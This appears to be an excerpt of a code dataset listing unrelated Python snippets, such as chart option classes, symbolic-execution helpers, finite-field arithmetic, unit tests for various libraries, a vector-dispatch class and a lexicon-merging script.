code stringlengths 281 23.7M |
|---|
class OptionSeriesDependencywheelSonificationTracksMappingNoteduration(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
class SymbolicBitvecGenerator():
def __init__(self):
self.unique_vector_name_counter = {}
def get_sym_bitvec(self, constraint_type, gen, bv_size=256, unique=False, **kwargs):
vector_name = ConstraintType[constraint_type.name].value
label_template = (vector_name + '_gen{}')
for k in kwargs:
label_template += (((('_' + k) + '{') + k) + '}')
label = label_template.format(gen, **kwargs)
if unique:
unique_id = self.unique_vector_name_counter.get(vector_name, 0)
self.unique_vector_name_counter[vector_name] = (unique_id + 1)
label = ((label + '_uid') + str(unique_id))
assert ((constraint_type != ConstraintType.CALLDATA) or ('acc' not in kwargs))
if (constraint_type == ConstraintType.CALLDATA_ARRAY):
return z3.Array(label, z3.BitVecSort(bv_size), z3.BitVecSort(8))
elif (constraint_type in [ConstraintType.CALLER, ConstraintType.ORIGIN, ConstraintType.ENTRY_ACCOUNT]):
return svm_utils.zpad_bv_right(z3.BitVec(label, svm_utils.ADDRESS_LEN), svm_utils.VECTOR_LEN)
else:
return z3.BitVec(label, bv_size)
def get_sym_balance(self, account):
return z3.BitVec(((ConstraintType.BALANCE.value + '_') + str(account.id)), 256) |
def test_to_disk_writes_minified_manifest_as_default(manifest_dir):
build({}, package_name('package'), manifest_version('ethpm/3'), version('1.0.0'), write_to_disk(manifest_root_dir=manifest_dir, manifest_name='1.0.0.json'), validate())
actual_manifest = (manifest_dir / '1.0.0.json').read_text()
assert (actual_manifest == MINIFIED_MANIFEST) |
def test_regression(df_enc):
random = np.random.RandomState(42)
y = random.normal(0, 0.1, len(df_enc))
encoder = DecisionTreeEncoder(regression=True, random_state=random)
encoder.fit(df_enc[['var_A', 'var_B']], y)
X = encoder.transform(df_enc[['var_A', 'var_B']])
transf_df = df_enc.copy()
transf_df['var_A'] = ((([0.034348] * 6) + ([(- 0.024679)] * 10)) + ([(- 0.075473)] * 4))
transf_df['var_B'] = (([0.044806] * 10) + ([(- 0.079066)] * 10))
pd.testing.assert_frame_equal(X.round(6), transf_df[['var_A', 'var_B']]) |
def modexp_lr_k_ary(a, b, n, k=5):
base = (2 << (k - 1))
table = ([1] * base)
for i in range(1, base):
table[i] = ((table[(i - 1)] * a) % n)
r = 1
for digit in reversed(_digits_of_n(b, base)):
for i in range(k):
r = ((r * r) % n)
if digit:
r = ((r * table[digit]) % n)
return r |
class TestExtractGridFilter(unittest.TestCase):
def make_scatter(self):
pd = tvtk.PolyData()
pd.points = (100 + (100 * random.random((1000, 3))))
verts = arange(0, 1000, 1)
verts.shape = (1000, 1)
pd.verts = verts
pd.point_data.scalars = random.random(1000)
pd.point_data.scalars.name = 'scalars'
return pd
def make_grid4scatter(self):
src = VTKDataSource()
(xmin, xmax, dx) = (100, 200, 2)
nx = (int(((xmax - xmin) / dx)) + 1)
(ymin, ymax, dy) = (100, 200, 2)
ny = (int(((ymax - ymin) / dy)) + 1)
(zmin, zmax, dz) = (100, 200, 2)
nz = (int(((zmax - zmin) / dz)) + 1)
image_data = tvtk.ImageData(origin=(xmin, ymin, zmin), spacing=(dx, dy, dz), extent=(0, (nx - 1), 0, (ny - 1), 0, (nz - 1)))
src.data = image_data
return src
def setUp(self):
e = NullEngine()
e.start()
s = e.new_scene()
self.e = e
self.s = s
grid = self.make_grid4scatter()
e.add_source(grid)
eg = ExtractGrid()
e.add_filter(eg)
nb_ticks = 6
eg.x_ratio = eg.y_ratio = eg.z_ratio = ((100 / (nb_ticks - 1)) / 2)
gpx = GridPlane()
e.add_module(gpx)
gpx.grid_plane.axis = 'x'
gpy = GridPlane()
e.add_module(gpy)
gpy.grid_plane.axis = 'y'
gpz = GridPlane()
e.add_module(gpz)
gpz.grid_plane.axis = 'z'
d = VTKDataSource()
d.data = self.make_scatter()
e.add_source(d)
self.eg = eg
self.gpx = gpx
self.gpy = gpy
self.gpz = gpz
self.scene = e.current_scene
return
def tearDown(self):
self.e.stop()
return
def test_extract_grid_filter_sample(self):
import sys
if (sys.platform != 'darwin'):
raise unittest.SkipTest('actor.bounds returns incorrect values')
'Test if the sample rate works.'
eg = self.eg
gpx = self.gpx
gpy = self.gpy
gpz = self.gpz
self.assertEqual(allclose(gpx.actor.actor.bounds, (100.0, 100.0, 100.0, 200.0, 100.0, 200.0)), True)
self.assertEqual(allclose(gpy.actor.actor.bounds, (100.0, 200.0, 100.0, 100.0, 100.0, 200.0)), True)
self.assertEqual(allclose(gpz.actor.actor.bounds, (100.0, 200.0, 100.0, 200.0, 100.0, 100.0)), True)
eg.x_ratio = eg.y_ratio = eg.z_ratio = 25
self.assertEqual(allclose(gpx.actor.actor.bounds, (100.0, 100.0, 100.0, 200.0, 100.0, 200.0)), True)
self.assertEqual(allclose(gpy.actor.actor.bounds, (100.0, 200.0, 100.0, 100.0, 100.0, 200.0)), True)
self.assertEqual(allclose(gpz.actor.actor.bounds, (100.0, 200.0, 100.0, 200.0, 100.0, 100.0)), True)
eg.x_ratio = eg.y_ratio = eg.z_ratio = 5
self.assertEqual(allclose(gpx.actor.actor.bounds, (100.0, 100.0, 100.0, 200.0, 100.0, 200.0)), True)
self.assertEqual(allclose(gpy.actor.actor.bounds, (100.0, 200.0, 100.0, 100.0, 100.0, 200.0)), True)
self.assertEqual(allclose(gpz.actor.actor.bounds, (100.0, 200.0, 100.0, 200.0, 100.0, 100.0)), True)
return
def test_voi(self):
import sys
if (sys.platform != 'darwin'):
raise unittest.SkipTest('actor.bounds returns incorrect values')
'Test if setting the VOI works correctly.'
eg = self.eg
gpx = self.gpx
gpy = self.gpy
gpz = self.gpz
self.assertEqual(allclose(gpx.actor.actor.bounds, (100.0, 100.0, 100.0, 200.0, 100.0, 200.0)), True)
self.assertEqual(allclose(gpy.actor.actor.bounds, (100.0, 200.0, 100.0, 100.0, 100.0, 200.0)), True)
self.assertEqual(allclose(gpz.actor.actor.bounds, (100.0, 200.0, 100.0, 200.0, 100.0, 100.0)), True)
eg.x_ratio = eg.y_ratio = eg.z_ratio = 10
eg.trait_set(x_min=10, x_max=40)
eg.x_ratio = 5
self.assertEqual(allclose(gpx.actor.actor.bounds, (120.0, 120.0, 100.0, 200.0, 100.0, 200.0)), True)
self.assertEqual(allclose(gpy.actor.actor.bounds, (120.0, 180.0, 100.0, 100.0, 100.0, 200.0)), True)
self.assertEqual(allclose(gpz.actor.actor.bounds, (120.0, 180.0, 100.0, 200.0, 100.0, 100.0)), True)
eg.trait_set(y_min=20, y_max=40, z_min=10, z_max=30)
eg.trait_set(x_ratio=1, y_ratio=1, z_ratio=1)
eg.trait_set(x_min=0, x_max=50, y_min=0, y_max=50, z_min=0, z_max=50)
self.assertEqual(allclose(gpx.actor.actor.bounds, (100.0, 100.0, 100.0, 200.0, 100.0, 200.0)), True)
self.assertEqual(allclose(gpy.actor.actor.bounds, (100.0, 200.0, 100.0, 100.0, 100.0, 200.0)), True)
self.assertEqual(allclose(gpz.actor.actor.bounds, (100.0, 200.0, 100.0, 200.0, 100.0, 100.0)), True) |
class TestRepositoryExists(TestCase):
def test_missing_arg(self):
client = Mock()
with pytest.raises(MissingArgument, match='No value for "repository" provided'):
repository_exists(client)
def test_repository_in_results(self):
client = Mock()
client.snapshot.get_repository.return_value = {'repo': {'foo': 'bar'}}
assert repository_exists(client, repository='repo')
def test_repo_not_in_results(self):
client = Mock()
client.snapshot.get_repository.return_value = {'not_your_repo': {'foo': 'bar'}}
assert (not repository_exists(client, repository='repo')) |
.django_db
def test_child_recipient_failures(client):
create_recipient_profile_test_data(*TEST_RECIPIENT_PROFILES.values())
create_recipient_lookup_test_data(*TEST_RECIPIENT_LOOKUPS.values())
create_transaction_test_data()
non_existent_duns = ''
resp = client.get(recipient_children_endpoint(non_existent_duns, 'all'))
assert (resp.status_code == status.HTTP_400_BAD_REQUEST)
assert (resp.data['detail'] == "Recipient not found: '{}'.".format(non_existent_duns)) |
class EclrunConfig():
def __init__(self, config: EclConfig, version: str):
self.simulator_name: str = config.simulator_name
self.run_env: Optional[Dict[(str, str)]] = self._get_run_env(config.get_eclrun_env())
self.version: str = version
def _get_run_env(self, eclrun_env: Optional[Dict[(str, str)]]) -> Optional[Dict[(str, str)]]:
if (eclrun_env is None):
return None
env: dict = os.environ.copy()
if ('PATH' in eclrun_env):
env['PATH'] = ((eclrun_env['PATH'] + os.pathsep) + env['PATH'])
eclrun_env.pop('PATH')
for (key, value) in eclrun_env.copy().items():
if (value is None):
if (key in env):
env.pop(key)
eclrun_env.pop(key)
env.update(eclrun_env)
return env
def _get_available_eclrun_versions(self) -> List[str]:
try:
return subprocess.check_output(['eclrun', '--report-versions', self.simulator_name], env=self.run_env).decode('utf-8').strip().split(' ')
except subprocess.CalledProcessError:
return []
def can_use_eclrun(self) -> bool:
if (self.run_env is None):
return False
ecl_run_versions = self._get_available_eclrun_versions()
if (self.version not in ecl_run_versions):
return False
return True |
def encode_numpy(obj, chain=None):
if (not has_numpy):
return (obj if (chain is None) else chain(obj))
if (has_cupy and isinstance(obj, cupy.ndarray)):
obj = obj.get()
if isinstance(obj, np.ndarray):
if (obj.dtype.kind == 'V'):
kind = b'V'
descr = obj.dtype.descr
else:
kind = b''
descr = obj.dtype.str
return {b'nd': True, b'type': descr, b'kind': kind, b'shape': obj.shape, b'data': (obj.data if obj.flags['C_CONTIGUOUS'] else obj.tobytes())}
elif isinstance(obj, (np.bool_, np.number)):
return {b'nd': False, b'type': obj.dtype.str, b'data': obj.data}
elif isinstance(obj, complex):
return {b'complex': True, b'data': obj.__repr__()}
else:
return (obj if (chain is None) else chain(obj)) |
def test_base_types():
test_value = list([np.random.random((4, 2))])
out_value = map_nested_structure(test_value, mapping=(lambda x: torch.from_numpy(x)), in_place=True)
def foo(elem):
elem[0] = (elem[0] * 2)
foo(test_value)
assert (test_value is out_value)
assert (test_value[0] is out_value[0])
assert isinstance(out_value[0], torch.Tensor)
assert isinstance(test_value[0], torch.Tensor)
test_value = list([np.random.random((4, 2))])
out_value = map_nested_structure(test_value, mapping=(lambda x: torch.from_numpy(x)), in_place=False)
foo(test_value)
assert (test_value is not out_value)
assert (test_value[0] is not out_value[0])
assert isinstance(out_value[0], torch.Tensor)
assert isinstance(test_value[0], np.ndarray) |
class VectorList(list):
def __init__(self, session, module_name):
self.session = session
self.module_name = module_name
list.__init__(self)
def find_first_result(self, names=[], format_args={}, condition=None, store_result=False, store_name=''):
if (not callable(condition)):
raise DevException(messages.vectors.wrong_condition_type)
if (not isinstance(store_name, str)):
raise DevException(messages.vectors.wrong_store_name_type)
for vector in self:
if (not self._os_match(vector.target)):
continue
names = [n for n in names if n]
if (names and (not any(((n in vector.name) for n in names)))):
continue
format_args['current_vector'] = vector.name
result = vector.run(format_args)
try:
condition_result = condition(result)
except Exception as e:
import traceback
log.info(traceback.format_exc())
log.debug((messages.vectorlist.vector_s_triggers_an_exc % vector.name))
condition_result = False
if condition_result:
if store_result:
self.session[self.module_name]['results'][vector.name] = result
if store_name:
self.session[self.module_name]['stored_args'][store_name] = vector.name
return (vector.name, result)
return (None, None)
def get_result(self, name, format_args={}, store_result=False):
vector = self.get_by_name(name)
if (vector and self._os_match(vector.target)):
format_args['current_vector'] = vector.name
result = vector.run(format_args)
if store_result:
self.session[self.module_name]['results'][name] = result
return result
def get_results(self, names=[], format_args={}, results_to_store=[]):
response = {}
for vector in self:
if (not self._os_match(vector.target)):
continue
if (names and (not any(((x in vector.name) for x in names)))):
continue
format_args['current_vector'] = vector.name
response[vector.name] = vector.run(format_args)
if (not any(((x in vector.name) for x in results_to_store))):
continue
self.session[self.module_name]['results'][vector.name] = response[vector.name]
return response
def _os_match(self, os):
os_string = self.session['system_info']['results'].get('os')
if (not os_string):
return True
os_current = (Os.WIN if os_string.lower().startswith('win') else Os.NIX)
return (os in (os_current, Os.ANY))
def get_by_name(self, name):
return next((v for v in self if (v.name == name)), None)
def get_names(self):
return [v.name for v in self] |
class PythonShellPane(TaskPane):
id = 'pyface.tasks.contrib.python_shell.pane'
name = 'Python Shell'
editor = Instance(PythonShell)
bindings = List(Dict)
commands = List(Str)
def create(self, parent):
logger.debug('PythonShellPane: creating python shell pane')
self.editor = PythonShell(parent)
self.control = self.editor.control
logger.debug('PythonShellPane: binding variables')
for binding in self.bindings:
for (name, value) in binding.items():
self.editor.bind(name, value)
logger.debug('PythonShellPane: executing startup commands')
for command in self.commands:
self.editor.execute_command(command)
logger.debug('PythonShellPane: created')
def destroy(self):
if (self.editor is not None):
logger.debug('PythonShellPane: destroying python shell pane')
self.editor.destroy()
self.editor = None
logger.debug('PythonShellPane: destroyed')
super().destroy() |
def get_entities_in_file(filename: pathlib.Path, should_delete: bool) -> Entities:
flyte_ctx = context_manager.FlyteContextManager.current_context().new_builder()
module_name = os.path.splitext(os.path.relpath(filename))[0].replace(os.path.sep, '.')
with context_manager.FlyteContextManager.with_context(flyte_ctx):
with module_loader.add_sys_path(os.getcwd()):
importlib.import_module(module_name)
workflows = []
tasks = []
module = importlib.import_module(module_name)
for name in dir(module):
o = module.__dict__[name]
if isinstance(o, WorkflowBase):
workflows.append(name)
elif isinstance(o, PythonTask):
tasks.append(name)
if (should_delete and os.path.exists(filename)):
os.remove(filename)
return Entities(workflows, tasks) |
()
_context
_option('--language', callback=captive_prompt_callback((lambda language: fuzzy_reverse_dict_lookup(language, INTL_LANG_OPTIONS)), choice_prompt_func((lambda : 'Please choose your language'), get_first_options(INTL_LANG_OPTIONS))), default='English', help='The language you wish to use the CLI in.', prompt=choice_prompt_func((lambda : 'Please choose your language'), get_first_options(INTL_LANG_OPTIONS))(), type=str)
('--non_interactive', default=False, is_flag=True, help='Disables interactive prompts. Warning: with this flag, there will be no confirmation step(s) to verify the input value(s). Please use it carefully.', hidden=False)
def cli(ctx: click.Context, language: str, non_interactive: bool) -> None:
config.language = language
config.non_interactive = non_interactive |
_default
class LiveLocationAttachment(LocationAttachment):
name = attr.ib(None, type=Optional[str])
expires_at = attr.ib(None, type=Optional[datetime.datetime])
is_expired = attr.ib(None, type=Optional[bool])
def _from_pull(cls, data):
return cls(id=data['id'], latitude=((data['coordinate']['latitude'] / (10 ** 8)) if (not data.get('stopReason')) else None), longitude=((data['coordinate']['longitude'] / (10 ** 8)) if (not data.get('stopReason')) else None), name=data.get('locationTitle'), expires_at=_util.millis_to_datetime(data['expirationTime']), is_expired=bool(data.get('stopReason')))
def _from_graphql(cls, data):
target = data['target']
image = None
media = data.get('media')
if (media and media.get('image')):
image = Image._from_uri(media['image'])
return cls(id=int(target['live_location_id']), latitude=(target['coordinate']['latitude'] if target.get('coordinate') else None), longitude=(target['coordinate']['longitude'] if target.get('coordinate') else None), image=image, url=data.get('url'), name=data['title_with_entities']['text'], expires_at=_util.seconds_to_datetime(target.get('expiration_time')), is_expired=target.get('is_expired')) |
def compute_mean_similarities(results, ignore_query=False):
similarities = []
for (query_key_1, result) in results:
sims = [x[1] for x in result if ((not ignore_query) or (x[0] != query_key_1))]
if (len(sims) == 0):
similarity = None
else:
similarity = np.mean(sims)
similarities.append((query_key_1, similarity))
return similarities |
(scope='session')
def db_container(docker_backend, docker_network):
image = docker_backend.ImageClass(os.environ.get('BODHI_INTEGRATION_POSTGRESQL_IMAGE', 'quay.io/bodhi-ci/postgresql'), tag='latest')
run_opts = ['--rm', '-e', 'POSTGRES_HOST_AUTH_METHOD=trust', '--name', 'database', '--network', docker_network.get_id(), '--network-alias', 'db', '--network-alias', 'db.ci']
container = image.run_via_binary(additional_opts=run_opts)
container.start()
print(container.get_metadata())
container.wait_for_port(5432, timeout=64)
container.execute(['/usr/bin/pg_isready', '-q', '-t', '64'])
(yield container)
stop_and_delete(container) |
class ScheduleDialog(QDialog):
def __init__(self, note, parent):
QDialog.__init__(self, parent, ((Qt.WindowType.WindowSystemMenuHint | Qt.WindowType.WindowTitleHint) | Qt.WindowType.WindowCloseButtonHint))
self.mw = aqt.mw
self.parent = parent
self.note = note
self.setup_ui()
self.setWindowTitle('Edit Schedule')
def setup_ui(self):
self.scheduler = QtScheduleComponent(self.note.reminder)
self.setLayout(QVBoxLayout())
c_lbl = QLabel(self)
c_icon = ('calendar_night.png' if state.is_nightmode() else 'calendar.png')
c_pixmap = QPixmap((utility.misc.get_web_folder_path() + f'icons/{c_icon}')).scaled(QSize(35, 35), Qt.KeepAspectRatio, Qt.SmoothTransformation)
c_lbl.setPixmap(c_pixmap)
hbox = QHBoxLayout()
hbox.addStretch()
hbox.addWidget(c_lbl)
hbox.addStretch()
self.layout().addSpacing(10)
self.layout().addLayout(hbox)
self.layout().addSpacing(16)
self.layout().addWidget(self.scheduler)
accept = QPushButton('Save')
accept.clicked.connect(self.accept)
hbox = QHBoxLayout()
hbox.addStretch()
hbox.addWidget(accept)
self.layout().addLayout(hbox)
def should_remove_schedule(self):
return (self.scheduler._get_schedule() == '')
def schedule(self):
return self.scheduler._get_schedule() |
class Cast(SqlTree):
type: Type
value: Sql
def _compile(self, qb):
if ((qb.target == mysql) and (self.type <= T.string)):
t = 'char'
else:
t = _compile_type(qb.target, self.type.as_nullable())
return (([f'CAST('] + self.value.compile_wrap(qb).code) + [f' AS {t})']) |
def test_deployment_addresses_genesis_hash(network):
manifest = ethpm.get_manifest('ipfs://testipfs-complex')
ropsten = ethpm.get_deployment_addresses(manifest, 'ComplexNothing', ROPSTEN_GENESIS_HASH)
assert (len(ropsten) == 1)
network.connect('ropsten')
assert (ropsten == ethpm.get_deployment_addresses(manifest, 'ComplexNothing')) |
def test_precision_value_judged_only_scores():
current = pd.DataFrame(data=dict(user_id=['a', 'a', 'a', 'b', 'b', 'b', 'c', 'c', 'c'], prediction=[1.25, 1.0, 0.3, 0.9, 0.8, 0.7, 1.0, 0.5, 0.3], target=[1, 0, 0, 0, 0, 0, 0, 0, 1]))
metric = PrecisionTopKMetric(k=3, no_feedback_users=True)
report = Report(metrics=[metric])
column_mapping = ColumnMapping()
report.run(reference_data=None, current_data=current, column_mapping=column_mapping)
results = metric.get_result()
assert (len(results.current) == 3)
assert np.isclose(results.current[1], 0.333333)
assert np.isclose(results.current[2], 0.166666)
assert np.isclose(results.current[3], 0.222222) |
class DefaultRAGGraphFactory(RAGGraphFactory):
def __init__(self, system_app=None, default_model_name: str=None, **kwargs: Any) -> None:
super().__init__(system_app=system_app)
self._default_model_name = default_model_name
self.kwargs = kwargs
from dbgpt.rag.graph_engine.graph_engine import RAGGraphEngine
self.rag_engine = RAGGraphEngine(model_name='proxyllm')
def init_app(self, system_app):
pass
def create(self, model_name: str=None, rag_cls: Type=None):
if (not model_name):
model_name = self._default_model_name
return self.rag_engine |
class XLMRPreDecoder(FairSeqPreDecoder):
def __init__(self, *, bos_id: int, eos_id: int):
self.bos_id = bos_id
self.eos_id = eos_id
super(XLMRPreDecoder, self).__init__(bos_id=bos_id, eos_id=eos_id, piece_updater=XLMRPreDecoder._fairseq_to_sentencepiece)
def _fairseq_to_sentencepiece(piece_id: int):
if (piece_id == FAIRSEQ_PIECE_IDS.FAIRSEQ_UNK):
return FAIRSEQ_PIECE_IDS.SPP_UNK
elif (piece_id == FAIRSEQ_PIECE_IDS.FAIRSEQ_BOS):
return FAIRSEQ_PIECE_IDS.SPP_BOS
elif (piece_id == FAIRSEQ_PIECE_IDS.FAIRSEQ_EOS):
return FAIRSEQ_PIECE_IDS.SPP_EOS
else:
return (piece_id - _XLMR_FAIRSEQ_OFFSET) |
class TestDataStreamStats():
def test_failure_if_feature_not_implemented_in_version(self):
clients = {'default': Client(info={'version': {'number': '7.6.0'}})}
cfg = create_config()
metrics_store = metrics.EsMetricsStore(cfg)
telemetry_params = {'data-stream-stats-sample-interval': random.randint(1, 100)}
t = telemetry.DataStreamStats(telemetry_params, clients, metrics_store)
with pytest.raises(exceptions.SystemSetupError, match='The data-stream-stats telemetry device can only be used with clusters from version 7.9 onwards'):
t.on_benchmark_start()
def test_failure_if_feature_not_implemented_in_distribution(self):
clients = {'default': Client(info={'version': {'number': '7.9.0', 'build_flavor': 'oss'}})}
cfg = create_config()
metrics_store = metrics.EsMetricsStore(cfg)
telemetry_params = {'data-stream-stats-sample-interval': random.randint(1, 100)}
t = telemetry.DataStreamStats(telemetry_params, clients, metrics_store)
with pytest.raises(exceptions.SystemSetupError, match='The data-stream-stats telemetry device cannot be used with an OSS distribution of Elasticsearch'):
t.on_benchmark_start()
def test_negative_sample_interval_forbidden(self):
clients = {'default': Client(), 'cluster_b': Client()}
cfg = create_config()
metrics_store = metrics.EsMetricsStore(cfg)
telemetry_params = {'data-stream-stats-sample-interval': ((- 1) * random.random())}
with pytest.raises(exceptions.SystemSetupError, match="The telemetry parameter 'data-stream-stats-sample-interval' must be greater than zero but was .*\\."):
telemetry.DataStreamStats(telemetry_params, clients, metrics_store) |
class FQP(object):
degree: int = 0
field_modulus: Union[(int, None)] = None
mc_tuples: Union[(List[Tuple[(int, int)]], None)] = None
def __init__(self, coeffs: Sequence[IntOrFQ], modulus_coeffs: Sequence[IntOrFQ]=()) -> None:
if (self.field_modulus is None):
raise AttributeError("Field Modulus hasn't been specified")
if (len(coeffs) != len(modulus_coeffs)):
raise Exception("coeffs and modulus_coeffs aren't of the same length")
if isinstance(coeffs[0], int):
self.coeffs = tuple(((coeff % self.field_modulus) for coeff in coeffs))
else:
self.coeffs = tuple(coeffs)
self.modulus_coeffs = tuple(modulus_coeffs)
self.degree = len(self.modulus_coeffs)
def __add__(self: T_FQP, other: T_FQP) -> T_FQP:
if (not isinstance(other, type(self))):
raise TypeError(f'Expected an FQP object, but got object of type {type(other)}')
return type(self)([(int((x + y)) % self.field_modulus) for (x, y) in zip(self.coeffs, other.coeffs)])
def __sub__(self: T_FQP, other: T_FQP) -> T_FQP:
if (not isinstance(other, type(self))):
raise TypeError(f'Expected an FQP object, but got object of type {type(other)}')
return type(self)([(int((x - y)) % self.field_modulus) for (x, y) in zip(self.coeffs, other.coeffs)])
def __mod__(self: T_FQP, other: Union[(int, T_FQP)]) -> T_FQP:
raise NotImplementedError('Modulo Operation not yet supported by fields')
def __mul__(self: T_FQP, other: Union[(int, T_FQP)]) -> T_FQP:
if isinstance(other, int):
return type(self)([((int(c) * other) % self.field_modulus) for c in self.coeffs])
elif isinstance(other, FQP):
b = ([0] * ((self.degree * 2) - 1))
inner_enumerate = list(enumerate(other.coeffs))
for (i, eli) in enumerate(self.coeffs):
for (j, elj) in inner_enumerate:
b[(i + j)] += int((eli * elj))
for exp in range((self.degree - 2), (- 1), (- 1)):
top = b.pop()
for (i, c) in self.mc_tuples:
b[(exp + i)] -= (top * c)
return type(self)([(x % self.field_modulus) for x in b])
else:
raise TypeError(f'Expected an int or FQP object, but got object of type {type(other)}')
def __rmul__(self: T_FQP, other: Union[(int, T_FQP)]) -> T_FQP:
return (self * other)
def __div__(self: T_FQP, other: Union[(int, T_FQP)]) -> T_FQP:
if isinstance(other, int):
return type(self)([((int(c) * prime_field_inv(other, self.field_modulus)) % self.field_modulus) for c in self.coeffs])
elif isinstance(other, type(self)):
return (self * other.inv())
else:
raise TypeError(f'Expected an int or FQP object, but got object of type {type(other)}')
def __truediv__(self: T_FQP, other: Union[(int, T_FQP)]) -> T_FQP:
return self.__div__(other)
def __pow__(self: T_FQP, other: int) -> T_FQP:
o = type(self)(([1] + ([0] * (self.degree - 1))))
t = self
while (other > 0):
if (other & 1):
o = (o * t)
other >>= 1
t = (t * t)
return o
def optimized_poly_rounded_div(self, a: Sequence[IntOrFQ], b: Sequence[IntOrFQ]) -> Sequence[IntOrFQ]:
dega = deg(a)
degb = deg(b)
temp = [x for x in a]
o = [0 for x in a]
for i in range((dega - degb), (- 1), (- 1)):
o[i] = int((o[i] + (temp[(degb + i)] * prime_field_inv(int(b[degb]), self.field_modulus))))
for c in range((degb + 1)):
temp[(c + i)] = (temp[(c + i)] - o[c])
return [(x % self.field_modulus) for x in o[:(deg(o) + 1)]]
def inv(self: T_FQP) -> T_FQP:
(lm, hm) = (([1] + ([0] * self.degree)), ([0] * (self.degree + 1)))
(low, high) = (cast(List[IntOrFQ], list((self.coeffs + (0,)))), cast(List[IntOrFQ], list((self.modulus_coeffs + (1,)))))
while deg(low):
r = cast(List[IntOrFQ], list(self.optimized_poly_rounded_div(high, low)))
r += ([0] * ((self.degree + 1) - len(r)))
nm = [x for x in hm]
new = [x for x in high]
for i in range((self.degree + 1)):
for j in range(((self.degree + 1) - i)):
nm[(i + j)] -= (lm[i] * int(r[j]))
new[(i + j)] -= (low[i] * r[j])
nm = [(x % self.field_modulus) for x in nm]
new = [(int(x) % self.field_modulus) for x in new]
(lm, low, hm, high) = (nm, new, lm, low)
return (type(self)(lm[:self.degree]) / low[0])
def __repr__(self) -> str:
return repr(self.coeffs)
def __eq__(self: T_FQP, other: T_FQP) -> bool:
if (not isinstance(other, type(self))):
raise TypeError(f'Expected an FQP object, but got object of type {type(other)}')
for (c1, c2) in zip(self.coeffs, other.coeffs):
if (c1 != c2):
return False
return True
def __ne__(self: T_FQP, other: T_FQP) -> bool:
return (not (self == other))
def __neg__(self: T_FQP) -> T_FQP:
return type(self)([(- c) for c in self.coeffs])
_property
def sgn0(self: T_FQP) -> int:
sign = 0
zero = 1
for x_i in self.coeffs:
sign_i = mod_int(x_i, 2)
zero_i = (x_i == 0)
sign = (sign or (zero and sign_i))
zero = (zero and zero_i)
return sign
def one(cls: Type[T_FQP]) -> T_FQP:
return cls(([1] + ([0] * (cls.degree - 1))))
def zero(cls: Type[T_FQP]) -> T_FQP:
return cls(([0] * cls.degree)) |
class TestConfigYamlDict(unittest.TestCase):
test_filename = './config.yaml'
test_dict = {'test_dict': [{'test_key_1': 'test_value_1'}, {'test_key_1': 'test_value_2'}]}
valid_data = json.dumps(test_dict)
invalid_data = '\n test_dict:\n test_key_1: test_value_1\n test_key_2\n '
('builtins.open', new_callable=mock_open, read_data=valid_data)
def test_load_from_file_success(self, mock_file) -> None:
self.assertEqual(open(self.test_filename).read(), self.valid_data)
load_data = ConfigYamlDict.from_file(self.test_filename)
self.assertEqual(load_data, self.test_dict)
('builtins.open', new_callable=mock_open, read_data=invalid_data)
def test_load_from_invalid_file(self, mock_file) -> None:
self.assertEqual(open(self.test_filename).read(), self.invalid_data)
with self.assertRaises(ConfigYamlFileParsingError) as error_context:
ConfigYamlDict.from_file(self.test_filename)
self.assertTrue(str(error_context.exception).startswith(f'''
{self.test_filename} is not a valid YAML file.
Please make sure that the content of your config is a valid YAML.
Cause:''')) |
def main():
ap = argparse.ArgumentParser(description='Merge master TSV with additional lexemes in batch')
ap.add_argument('--quiet', '-q', action='store_false', dest='verbose', default=False, help='do not print output to stdout while processing')
ap.add_argument('--verbose', '-v', action='store_true', default=False, help='print each step to stdout while processing')
ap.add_argument('--version', '-V', action='version')
ap.add_argument('--input', '-i', required=True, dest='infilename', metavar='IFILE', help='read dictionary data from IFILE')
ap.add_argument('--merge', '-m', required=True, dest='mergefilename', metavar='MFILE', help='read auxiliary data from MFILEs')
ap.add_argument('--output', '-o', action='store', required=True, dest='outfilename', metavar='OFILE', help='write resulting data to OFILE')
ap.add_argument('--fields', '-f', action='store', type=int, default=3, metavar='N', help='read N fields from master')
ap.add_argument('--separator', '-s', action='store', default='\t', metavar='SEP', help='use SEP as separator')
ap.add_argument('--comment', '-C', action='append', default=['#'], metavar='COMMENT', help='skip lines starting with COMMENT thatdo not have SEPs')
ap.add_argument('--strip', '-S', action='store', metavar='STRIP', help='strip STRIP from fields before using')
ap.add_argument('--ignore-errors', '-I', action='store_true', default=False, help='silently ignore references to entries missing from master file')
args = ap.parse_args()
if ((args.strip == '"') or (args.strip == "'")):
quoting = csv.QUOTE_ALL
else:
quoting = csv.QUOTE_NONE
linecount = 0
entry_count = 0
lexdata = dict()
with open(args.infilename, 'r', newline='') as tsv_file:
if args.verbose:
print('Reading dictionary from', args.infilename)
tsv_reader = csv.DictReader(tsv_file, delimiter=args.separator, strict=True)
for tsv_parts in tsv_reader:
if ((len(tsv_parts) < 2) or (tsv_parts['lemma'] == None) or (tsv_parts['homonym'] == None)):
print('Too few tabs on line, skipping:', tsv_parts)
continue
lexkey = ((tsv_parts['lemma'] + '\t') + tsv_parts['homonym'])
lexdata[lexkey] = tsv_parts
if args.verbose:
print('\n', entry_count, 'entries in database')
with open(args.mergefilename, 'r', newline='') as tsv_file:
if args.verbose:
print('Reading merges from', args.mergefilename)
linecount = 0
merged = 0
added = 0
missed = 0
tsv_reader = csv.DictReader(tsv_file, delimiter=args.separator, strict=True)
for tsv_parts in tsv_reader:
if ((len(tsv_parts) < 2) or (tsv_parts['lemma'] == None) or (tsv_parts['homonym'] == None) or (tsv_parts['origin'] == None)):
print('Too few tabs on line, skipping:', tsv_parts)
continue
lexkey = ((tsv_parts['lemma'] + '\t') + tsv_parts['homonym'])
if (lexkey in lexdata):
reflex = lexdata[lexkey]
if (reflex['new_para'] == tsv_parts['new_para']):
if (lexdata[lexkey]['origin'] == 'unk'):
lexdata[lexkey]['origin'] = tsv_parts['origin']
elif (tsv_parts['origin'] in lexdata[lexkey]['origin']):
pass
else:
lexdata[lexkey]['origin'] += ('|' + tsv_parts['origin'])
merged += 1
else:
lexparas = tsv_parts['new_para'].split('_')
refparas = lexdata[lexkey]['new_para'].split('_')
if (lexparas[0] == refparas[0]):
if args.verbose:
print('merging', lexkey, 'fuzzy match', lexparas, refparas)
